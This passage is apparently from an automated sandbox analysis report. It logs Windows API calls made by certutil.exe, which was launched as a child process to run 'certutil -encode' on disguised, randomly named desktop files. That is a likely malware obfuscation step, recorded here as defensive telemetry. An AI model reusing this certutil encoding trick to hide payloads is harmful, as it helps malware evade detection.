uID=0x7e6, lpBuffer=0x702cef540, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0260.307] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x1b261c789f0 [0260.307] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0260.307] _vsnwprintf (in: _Buffer=0x702cee770, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x702cef7c8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0260.307] GetFileType (hFile=0x50) returned 0x2 [0260.307] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x702cee770*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x702cee724, lpReserved=0x0 | out: lpBuffer=0x702cee770*, lpNumberOfCharsWritten=0x702cee724*=0x31) returned 1 [0260.412] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0260.412] _vsnwprintf (in: _Buffer=0x702cee770, _BufferCount=0x1ff, _Format="\n", _ArgList=0x702cef7c8 | out: _Buffer="\n") returned 1 [0260.412] GetFileType (hFile=0x50) returned 0x2 [0260.412] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x702cee770*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x702cee724, lpReserved=0x0 | out: lpBuffer=0x702cee770*, lpNumberOfCharsWritten=0x702cee724*=0x1) returned 1 [0260.621] LocalFree (hMem=0x0) returned 0x0 [0260.621] LocalFree (hMem=0x1b261c79190) returned 0x0 [0260.621] LocalFree (hMem=0x1b261c74440) returned 0x0 [0260.621] SetLastError (dwErrCode=0x80070716) [0260.621] _vsnwprintf (in: _Buffer=0x702cef7f8, _BufferCount=0xb, _Format="%d", _ArgList=0x702cef7e8 | out: _Buffer="511") returned 3 [0260.621] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x702cef5b0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0260.621] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1b261ca1b50 [0260.622] PostQuitMessage (nExitCode=0) [0260.622] GetMessageW (in: lpMsg=0x702cefdf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x702cefdf0) returned 0 [0260.622] LocalFree (hMem=0x1b261c8bdb0) returned 0x0 [0260.622] LocalFree (hMem=0x1b261ca15e0) returned 0x0 [0260.622] LocalFree (hMem=0x0) returned 0x0 [0260.622] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0260.624] GetLastError () returned 0x7e [0260.625] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0260.625] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0260.625] DllMain () returned 0x1 [0260.625] LocalFree (hMem=0x1b261c8bd70) returned 0x0 [0260.625] LocalFree (hMem=0x1b261c821b0) returned 0x0 [0260.625] LocalFree (hMem=0x1b261ca1a90) returned 0x0 [0260.625] LocalFree (hMem=0x1b261ca18e0) returned 0x0 [0260.625] LocalFree (hMem=0x1b261c789f0) returned 0x0 [0260.625] LocalFree (hMem=0x1b261ca1b50) returned 0x0 [0260.625] LocalFree (hMem=0x1b261c951d0) returned 0x0 [0260.625] LocalFree (hMem=0x1b261c81e80) returned 0x0 [0260.625] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0260.625] GetLastError () returned 0x7e [0260.626] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0260.626] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0260.626] DllMain () returned 0x1 [0260.626] exit (_Code=0) Thread: id = 89 os_tid = 0xe14 Thread: id = 90 os_tid = 0x888 Process: id = "33" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x22e20000" os_pid = "0xedc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"VOv-CkMzVt4YRw.odp.Sister\" \"VOv-CkMzVt4YRw.odp.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 91 os_tid = 0xa84 [0263.285] GetStartupInfoW (in: lpStartupInfo=0xf1c92df9e0 | out: lpStartupInfo=0xf1c92df9e0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"VOv-CkMzVt4YRw.odp.Sister\" \"VOv-CkMzVt4YRw.odp.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0263.287] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0263.287] __set_app_type (_Type=0x1) [0263.287] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0263.288] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0263.291] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0263.291] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0263.292] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0263.292] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0263.292] WerSetFlags () returned 0x0 [0263.293] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0263.293] __iob_func () returned 0x7ffcea2dea00 [0263.293] _fileno (_File=0x7ffcea2dea30) returned 1 [0263.293] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0263.293] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0263.294] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0263.295] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0263.295] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0263.295] GetConsoleOutputCP () returned 0x1b5 [0263.365] _vsnwprintf (in: _Buffer=0xf1c92df950, _BufferCount=0xb, _Format=".%d", _ArgList=0xf1c92df878 | out: _Buffer=".437") returned 4 [0263.366] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0263.366] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0263.366] GetFileType (hFile=0x50) returned 0x2 [0263.366] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0263.366] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0263.366] SetThreadUILanguage (LangId=0x0) returned 0x409 [0263.436] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0263.436] GetCommandLineW () returned="certutil -encode \"VOv-CkMzVt4YRw.odp.Sister\" \"VOv-CkMzVt4YRw.odp.Cruel\"" [0263.436] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2cd99fab580 [0263.437] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2cd99fa3030 [0263.437] LocalFree (hMem=0x2cd99fab580) returned 0x0 [0263.437] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2cd99f9c7f0 [0263.437] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x2cd99fa49a0 [0263.437] LocalFree (hMem=0x2cd99f9c7f0) returned 0x0 [0263.437] LocalFree (hMem=0x2cd99fa3030) returned 0x0 [0263.437] LocalFree (hMem=0x0) returned 0x0 [0263.437] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0263.437] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0263.438] GetCommandLineW () returned="certutil -encode \"VOv-CkMzVt4YRw.odp.Sister\" \"VOv-CkMzVt4YRw.odp.Cruel\"" [0263.438] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2cd99fab620 [0263.438] GetSystemTime (in: lpSystemTime=0xf1c92df640 | out: lpSystemTime=0xf1c92df640*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x25, wMilliseconds=0x3d3)) [0263.438] SystemTimeToFileTime (in: lpSystemTime=0xf1c92df640, lpFileTime=0xf1c92df638 | out: lpFileTime=0xf1c92df638) returned 1 [0263.439] FileTimeToLocalFileTime (in: lpFileTime=0xf1c92df638, lpLocalFileTime=0xf1c92df600 | out: lpLocalFileTime=0xf1c92df600) returned 1 [0263.439] FileTimeToSystemTime (in: lpFileTime=0xf1c92df600, lpSystemTime=0xf1c92df370 | out: lpSystemTime=0xf1c92df370) returned 1 [0263.439] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xf1c92df370, lpFormat=0x0, lpDateStr=0xf1c92df480, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0263.439] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xf1c92df370, lpFormat=0x0, lpTimeStr=0xf1c92df380, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0263.439] _vsnwprintf (in: _Buffer=0xf1c92df38e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xf1c92df358 | out: _Buffer=" 37.979s") returned 8 [0263.439] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x2cd99fae000 [0263.439] SetLastError (dwErrCode=0x80070716) [0263.439] _vsnwprintf (in: _Buffer=0xf1c92df408, _BufferCount=0xb, _Format="%d", _ArgList=0xf1c92df3f8 | out: _Buffer="948") returned 3 [0263.439] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xf1c92df1c0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0263.440] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2cd99fabba0 [0263.440] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x2cd99f9ce90 [0263.440] LocalFree (hMem=0x2cd99fae000) returned 0x0 [0263.440] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf1c92df6b0 | out: lpSystemTimeAsFileTime=0xf1c92df6b0*(dwLowDateTime=0xc7a1a8a0, dwHighDateTime=0x1d6141f)) [0263.440] GetLocalTime (in: lpSystemTime=0xf1c92df6e8 | out: lpSystemTime=0xf1c92df6e8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x25, wMilliseconds=0x3d5)) [0263.440] SystemTimeToFileTime (in: lpSystemTime=0xf1c92df6e8, lpFileTime=0xf1c92df6c0 | out: lpFileTime=0xf1c92df6c0) returned 1 [0263.440] CompareFileTime (lpFileTime1=0xf1c92df6c0, lpFileTime2=0xf1c92df6b0) returned 1 [0263.440] _vsnwprintf (in: _Buffer=0xf1c92df6f8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xf1c92df688 | out: _Buffer="GMT + 2.00") returned 10 [0263.440] LocalFree (hMem=0x2cd99fab620) returned 0x0 [0263.441] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde670000 [0263.441] FindResourceW (hModule=0x7ffcde670000, lpName=0x1, lpType=0x10) returned 0x7ffcde730090 [0263.441] LoadResource (hModule=0x7ffcde670000, hResInfo=0x7ffcde730090) returned 0x7ffcde7300b0 [0263.441] LockResource (hResData=0x7ffcde7300b0) returned 0x7ffcde7300b0 [0263.441] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0263.441] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xf1c92df728 | out: _Buffer="10.0.15063.447") returned 14 [0263.441] GetACP () returned 0x4e4 [0263.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0263.441] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2cd99fab9e0 [0263.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2cd99fab9e0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0263.441] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2cd99fadf40 [0263.441] _vsnwprintf (in: _Buffer=0x2cd99fadf40, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xf1c92df778 | out: _Buffer="10.0.15063.447 retail") returned 21 [0263.441] LocalFree (hMem=0x2cd99fab9e0) returned 0x0 [0263.441] LocalFree (hMem=0x0) returned 0x0 [0263.442] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0263.442] GetACP () returned 0x4e4 [0263.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0263.442] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2cd99fab4a0 [0263.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2cd99fab4a0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0263.442] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2cd99fade00 [0263.442] _vsnwprintf (in: _Buffer=0x2cd99fade00, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xf1c92df778 | out: _Buffer="10.0.15063.447 retail") returned 21 [0263.442] LocalFree (hMem=0x2cd99fab4a0) returned 0x0 [0263.442] LocalFree (hMem=0x0) returned 0x0 [0263.442] GetACP () returned 0x4e4 [0263.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0263.442] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2cd99fab480 [0263.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2cd99fab480, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0263.442] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2cd99fae300 [0263.442] _vsnwprintf (in: _Buffer=0x2cd99fae300, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xf1c92df7a8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0263.442] LocalFree (hMem=0x2cd99fab480) returned 0x0 [0263.442] LocalFree (hMem=0x2cd99fadf40) returned 0x0 [0263.442] LocalFree (hMem=0x2cd99fade00) returned 0x0 [0263.442] LocalFree (hMem=0x2cd99fae300) returned 0x0 [0263.443] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0263.443] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0263.443] GetStockObject (i=0) returned 0x900010 [0263.443] RegisterClassW (lpWndClass=0xf1c92df8d0) returned 0xc1a2 [0263.444] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0xb02c6 [0263.535] NtdllDefWindowProc_W () returned 0x0 [0263.535] NtdllDefWindowProc_W () returned 0x1 [0263.549] NtdllDefWindowProc_W () returned 0x0 [0263.562] UpdateWindow (hWnd=0xb02c6) returned 1 [0263.562] PostMessageW (hWnd=0xb02c6, Msg=0x400, wParam=0x0, lParam=0x2cd99f9217e) returned 1 [0263.563] GetMessageW (in: lpMsg=0xf1c92df920, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf1c92df920) returned 1 [0263.563] TranslateMessage (lpMsg=0xf1c92df920) returned 0 [0263.563] DispatchMessageW (lpMsg=0xf1c92df920) returned 0x0 [0263.563] NtdllDefWindowProc_W () returned 0x0 [0263.563] GetMessageW (in: lpMsg=0xf1c92df920, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf1c92df920) returned 1 [0263.563] TranslateMessage (lpMsg=0xf1c92df920) returned 0 [0263.563] DispatchMessageW (lpMsg=0xf1c92df920) returned 0x0 [0263.563] LocalAlloc (uFlags=0x0, uBytes=0x7e) returned 0x2cd99f9a2d0 [0263.563] LocalAlloc (uFlags=0x0, uBytes=0x8a) returned 0x2cd99fa4d70 [0263.563] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0263.563] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0263.564] SetLastError (dwErrCode=0x80070716) [0263.564] _vsnwprintf (in: _Buffer=0xf1c92df328, _BufferCount=0xb, _Format="%d", _ArgList=0xf1c92df318 | out: _Buffer="465") returned 3 [0263.564] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xf1c92df0e0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0263.564] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2cd99fa4c10 [0263.564] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0263.564] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0263.564] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xf1c92df0c0, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0263.564] GetLastError () returned 0xcb [0263.564] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0263.565] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0263.565] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0263.565] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0263.565] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0263.565] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0263.565] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0263.565] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0263.565] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0263.565] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0263.565] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0263.565] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0263.565] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0263.565] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0263.565] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0263.565] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0263.565] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0263.565] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0263.565] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0263.565] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0263.566] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0263.566] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xf1c92ded88 | out: phkResult=0xf1c92ded88*=0x23c) returned 0x0 [0263.566] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x2cd99f9d4e0 [0263.566] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xf1c92df2f8, lpData=0xf1c92df328, lpcbData=0xf1c92df2f0*=0x4 | out: lpType=0xf1c92df2f8*=0x0, lpData=0xf1c92df328*=0x0, lpcbData=0xf1c92df2f0*=0x4) returned 0x2 [0263.566] LocalFree (hMem=0x2cd99f9d4e0) returned 0x0 [0263.566] RegCloseKey (hKey=0x23c) returned 0x0 [0263.566] LocalFree (hMem=0x0) returned 0x0 [0263.566] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x2cd99fbd4c0 [0263.686] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0263.686] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0263.686] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0263.686] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0263.686] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0263.686] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0263.686] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0263.686] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0263.686] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0263.687] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0263.687] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0263.687] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0263.687] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0263.687] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0263.687] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0263.687] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0263.687] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2cd99fb74f0 [0263.687] GetComputerNameW (in: lpBuffer=0x2cd99fb74f0, nSize=0xf1c92df2f0 | out: lpBuffer="NQDPDE", nSize=0xf1c92df2f0) returned 1 [0263.687] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xf1c92df2c0 | out: lpBuffer=0x0, nSize=0xf1c92df2c0) returned 0 [0263.688] GetLastError () returned 0xea [0263.688] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2cd99fab900 [0263.688] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x2cd99fab900, nSize=0xf1c92df2c0 | out: lpBuffer="NQdPdE", nSize=0xf1c92df2c0) returned 1 [0263.688] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0263.692] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x2cd99fc09b0, cbCertEncoded=0xdded) returned 0x0 [0263.697] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x2cd99fc09b0, cbCrlEncoded=0xdded) returned 0x0 [0263.699] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x2cd99fc09b0, cbEncoded=0xdded, dwFlags=0x8000, pDecodePara=0xf1c92df1a0, pvStructInfo=0xf1c92df230, pcbStructInfo=0xf1c92df224 | out: pvStructInfo=0xf1c92df230, pcbStructInfo=0xf1c92df224) returned 0 [0263.699] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x2cd99fc09b0, cbEncoded=0xdded, dwFlags=0x8000, pDecodePara=0xf1c92df1a0, pvStructInfo=0xf1c92df230, pcbStructInfo=0xf1c92df224 | out: pvStructInfo=0xf1c92df230, pcbStructInfo=0xf1c92df224) returned 0 [0263.699] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x2cd99fc09b0, cbEncoded=0xdded, dwFlags=0x8000, pDecodePara=0xf1c92df1a0, pvStructInfo=0xf1c92df230, pcbStructInfo=0xf1c92df224 | out: pvStructInfo=0xf1c92df230, pcbStructInfo=0xf1c92df224) returned 0 [0263.700] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x2cd99fa0660 [0263.728] CryptMsgUpdate (hCryptMsg=0x2cd99fa0660, pbData=0x2cd99fc09b0, cbData=0xdded, fFinal=1) returned 0 [0263.728] GetLastError () returned 0x8009310b [0263.729] CryptMsgClose (hCryptMsg=0x2cd99fa0660) returned 1 [0263.729] GetFileAttributesExW (in: lpFileName="VOv-CkMzVt4YRw.odp.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\vov-ckmzvt4yrw.odp.sister"), fInfoLevelId=0x0, lpFileInformation=0xf1c92df250 | out: lpFileInformation=0xf1c92df250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe895cef0, ftCreationTime.dwHighDateTime=0x1d5ee1a, ftLastAccessTime.dwLowDateTime=0x7dd32d20, ftLastAccessTime.dwHighDateTime=0x1d5e43c, ftLastWriteTime.dwLowDateTime=0x7dd32d20, ftLastWriteTime.dwHighDateTime=0x1d5e43c, nFileSizeHigh=0x0, nFileSizeLow=0xdded)) returned 1 [0263.767] _vsnwprintf (in: _Buffer=0xf1c92df258, _BufferCount=0xb, _Format="%d", _ArgList=0xf1c92df248 | out: _Buffer="359") returned 3 [0263.767] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xf1c92df010, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0263.768] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2cd99fb6fb0 [0263.768] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0263.768] _vsnwprintf (in: _Buffer=0xf1c92de240, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xf1c92df298 | out: _Buffer="Input Length = 56813") returned 20 [0263.768] GetFileType (hFile=0x50) returned 0x2 [0263.768] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf1c92de240*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xf1c92de1f4, lpReserved=0x0 | out: lpBuffer=0xf1c92de240*, lpNumberOfCharsWritten=0xf1c92de1f4*=0x14) returned 1 [0263.841] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0263.841] _vsnwprintf (in: _Buffer=0xf1c92de240, _BufferCount=0x1ff, _Format="\n", _ArgList=0xf1c92df298 | out: _Buffer="\n") returned 1 [0263.841] GetFileType (hFile=0x50) returned 0x2 [0263.841] WriteConsoleW (in: hConsoleOutput=0x50, 